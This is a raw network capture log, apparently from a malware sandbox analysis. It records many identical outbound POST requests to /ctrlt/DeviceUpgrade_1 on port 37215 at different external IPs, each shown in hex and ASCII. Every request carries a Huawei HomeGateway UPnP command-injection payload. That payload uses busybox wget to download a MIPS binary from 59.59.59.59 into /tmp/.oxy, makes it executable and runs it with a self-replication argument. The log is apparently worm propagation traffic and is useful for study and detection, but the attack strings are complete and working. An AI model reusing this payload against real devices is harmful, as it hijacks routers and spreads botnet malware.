                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2066192.168.2.1543020197.208.28.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.076843023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2067192.168.2.155469241.61.93.22437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.081181049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2068192.168.2.154621641.188.206.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.081924915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2069192.168.2.154402841.88.212.2437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086322069 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2070192.168.2.1544174140.35.223.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086349964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2071192.168.2.154065041.212.106.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086380005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2072192.168.2.1538424197.20.156.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086438894 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2073192.168.2.155463434.36.174.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086464882 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2074192.168.2.1538322136.103.76.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086478949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2075192.168.2.1538952197.182.192.11637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086503029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 